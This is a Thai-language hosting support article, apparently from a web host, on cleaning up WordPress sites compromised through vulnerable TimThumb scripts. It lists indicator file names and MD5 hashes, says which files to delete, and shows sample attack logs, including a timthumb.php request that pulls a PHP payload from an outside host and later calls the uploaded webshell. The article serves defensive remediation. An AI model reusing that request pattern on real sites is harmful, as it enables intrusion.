ความเสี่ยงต่อการถูกล้วงข้อมูล WordPress TimThumb

TimThumb เป็นเครื่องมือที่ธีมและปลั๊กอินของ WordPress ใช้ในการย่อขนาดภาพ TimThumb เวอร์ชั่นเก่ามีช่องโหว่ด้านการรักษาความปลอดภัยที่ปล่อยให้ผู้โจมตีสามารถอัพโหลดไฟล์ที่เป็นอันตราย (“ไม่ดี”) จากเว็บไซต์อื่นได้ จากนั้นไฟล์ที่ไม่ดีไฟล์แรกจะปล่อยให้ผู้โจมตีอัพโหลดไฟล์ที่เป็นอันตรายเข้ามาในบัญชีโฮสติ้งได้อีก

คุณสามารถรับข้อมูลเพิ่มเติมเกี่ยวกับความเสี่ยงต่อการถูกล้วงข้อมูลและวิธีการรับมือได้ใน หากเว็บไซต์ของฉันถูกแฮ็กจะเป็นอย่างไร

สัญญาณที่บอกว่าคุณตกอยู่ในความเสี่ยงต่อการถูกล้วงข้อมูลแล้ว

นอกเหนือไปจากสัญญาณที่กล่าวถึงใน หากเว็บไซต์ของฉันถูกแฮ็กจะเป็นอย่างไร คุณยังสามารถบอกได้ว่าเว็บไซต์ของคุณติดไวรัสแล้วโดยความเสี่ยงต่อการถูกล้วงข้อมูลรูปแบบนี้ หากบัญชีของคุณมีไฟล์ที่มีรูปแบบต่อไปนี้อยู่ในไดเรกทอรีปลั๊กอิน:

  • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — ตัวอย่างเช่น: 7eebe45bde5168488ac4010f0d65cea8.php

คุณสามารถค้นหาตัวอย่างของ md5 hash ที่เป็นไปได้ได้ในส่วน ไฟล์ MD5SUMS ที่เป็นอันตรายและที่เป็นที่รู้จัก ของบทความนี้

หรือคุณอาจค้นหาไฟล์ต่อไปนี้ในรูทไดเร็คทอรีของเว็บไซต์คุณ (ข้อมูลเพิ่มเติม)

  • x.txt
  • logx.txt

การแก้ไข

คุณต้องลบไฟล์ที่เป็นอันตรายและไฟล์ที่ไม่ดีออกทั้งหมด ก่อนทำการลบ เราขอแนะนำให้ทำการสำรองข้อมูลของเว็บไซต์ของคุณไว้ก่อน (ข้อมูลเพิ่มเติม)

การค้นหาตำแหน่งไฟล์ที่ไม่ดี

โดยทั่วไปแล้ว ไฟล์ที่ไม่ดีที่ได้รับการอัพโหลดไว้แต่เริ่มแรกผ่านช่องโหว่ของ TimThumb จะอยู่ในไดเรกทอรี /theme หรือ /plugin ที่มีไฟล์ TimThumb ที่มีช่องโหว่

  • /tmp
  • /cache
  • /images

ตัวอย่างตำแหน่งที่ตั้งของไฟล์ที่ไม่ดี:

[webroot]/wp-content/themes/[ธีมที่มีช่องโหว่ของ TimThumb]/cache/images/

ตัวอย่างของชื่อไฟล์ที่ไม่ดีในตำแหน่งที่ตั้งเหล่านี้:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

ไฟล์ x.txt และ logx.txt จะมีข้อมูลเกี่ยวกับเวลาที่ไฟล์ที่ไม่ดีได้รับการสร้างขึ้นโดยใช้ช่องโหว่ของ TimThumb และตำแหน่งที่ตั้งของไฟล์ที่ไม่ดีในบัญชีโฮสติ้งดังกล่าว ข้อมูลนี้จะเป็นประโยชน์ในการพิจารณาว่าไฟล์ใดที่จำเป็นต้องได้รับการลบออก และจะหาไฟล์เหล่านั้นได้จากที่ใด แต่ ไม่ได้หมายความว่าข้อมูลนี้จะให้รายการไฟล์ที่จำเป็นต้องลบออกอย่างครบถ้วน

ตัวอย่าง:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

ไฟล์ที่ต้องลบ

หลังจากสร้างการสำรองข้อมูลของเว็บไซต์แล้ว ให้ลบไฟล์ต่อไปนี้

  • x.txt
  • logx.txt
  • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — ตัวอย่างเช่น: 7eebe45bde5168488ac4010f0d65cea8.php
  • ไฟล์ PHP ที่เป็นอันตรายอื่น ๆ ที่พบพร้อมกับไฟล์ที่มีชื่อ md5 hash

คุณสามารถดำเนินการนี้ได้ผ่าน FTP (ข้อมูลเพิ่มเติม) หรือผ่านโปรแกรมจัดการไฟล์ในแผงควบคุมของบัญชีโฮสติ้งของคุณ (ข้อมูลเพิ่มเติม)

และคุณควร:

  • อัพเดทธีมและปลั๊กอินของคุณทั้งหมดให้เป็นเวอร์ชั่นล่าสุด
  • แทนที่อินสแตนซ์ของ TimThumb.php ด้วยเวอร์ชั่นล่าสุด ซึ่งสามารถหาได้จากที่นี่

ข้อมูลทางเทคนิค

ตัวอย่างของ HTTP Logs

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

ไฟล์ MD5SUMS ที่เป็นอันตรายและที่เป็นที่รู้จัก

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

ไฟล์ที่เป็นอันตรายเพิ่มเติม

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

บทความนี้มีประโยชน์หรือไม่
ขอบคุณสำหรับคำติชมของคุณ หากต้องการพูดคุยกับตัวแทนฝ่ายบริการลูกค้า โปรดใช้หมายเลขโทรศัพท์ฝ่ายสนับสนุนหรือตัวเลือกแชทข้างบนนี้
ยินดีมากที่เราได้ช่วยเหลือ! ยังมีอย่างอื่นที่เราสามารถช่วยคุณได้หรือไม่
เสียใจด้วย บอกเราว่าอะไรที่ทำให้คุณสับสนหรือเหตุใดการแก้ไขนี้จึงไม่ช่วยคลี่คลายปัญหาของคุณ